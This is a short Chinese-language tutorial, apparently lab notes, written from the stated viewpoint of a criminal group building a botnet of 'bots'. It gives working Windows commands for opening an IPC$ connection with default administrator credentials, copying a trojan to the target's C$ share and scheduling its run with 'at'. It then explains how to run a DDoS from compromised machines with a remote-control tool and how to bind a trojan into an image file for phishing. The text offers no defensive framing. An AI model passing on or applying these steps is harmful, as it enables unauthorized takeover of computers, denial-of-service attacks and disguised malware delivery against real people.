木马分析

一、背景

黑产组织，需要在互联网中抓大量的肉鸡，制作一个可以远程控制肉鸡电脑的木马，然后在通过各种方式在互联网上抓鸡（捆绑、钓鱼、入侵、供应链攻击）

二、准备动作

找一台PC，Windows版本 （win10以上不能使用）再找一台服务器win03. 木马工具、账密破解工具

三、准备环境

1️⃣需要两台PC能够在网络上连接，调整网卡在VMnet2，手动配置IP地址，10.0.0.1 – 10.0.0.2不用配置网关和DNS等参数。

2️⃣测试连通性：ping 10.0.0.1 返回的结果出现TTL值则证明网络正常联通

3️⃣分析黑客的攻击心里：

网络攻击需要具备3元素：对方IP地址、对方账密、对面杀软

找IP：需要用到流量分析软件 wireshark 科来

破解账密：社会工程学，暴力破解

4️⃣通过网络共享管道，进行IPC连接，连接之后可以传输木马到对面服务器中

net use \\10.0.0.2\ipc$ 123 /user:administrator

通过系统net use命令，来跟10.0.0.2的IPC$共享管道建立网络链接，使用的默认的管理员账密

5️⃣拷贝木马文件到被攻击电脑上

copy ys.exe \\10.0.0.2\c$

6️⃣查看对端PC时间

net time \\10.0.0.2

7️⃣通过任务计划来实现，无人控制木马定时启动

at \\10.0.0.2 03:20 \\10.0.0.2\c$\ys.exe

四、DDos 分布式拒绝服务攻击

原理：根据正常业务流程，占用服务端正常提供的服务接口，大量的取代正常访问业务的流量，使之正常访问业务的PC、服务不能够正常运行。

特性：1️⃣占用服务的量必须要足够（肉鸡的数量） 2️⃣服务不能够停止

五、NTP工具：流量测试工具（压力测试）

查看端口：Windows

在cmd中输入 netstat -an

首先要在我们的服务器中，开启phpstudy，把网站的四大组件运行，运行以后则开放80端口

利用NTP工具，生成木马，然后根据IPC$传输到对面，并且自动执行。

需要2台以上的肉鸡，所以我们也需要让自己(XP)也需要中木马，

选中两个已经上线的肉鸡，选择流量测试，添加攻击IP，添加任务，在任务界面下，运行。

状态：被攻击者，CPU爆满。

捆绑成图片：打开软件后，需要把图片放在主文件中，木马放在第二个文件框中。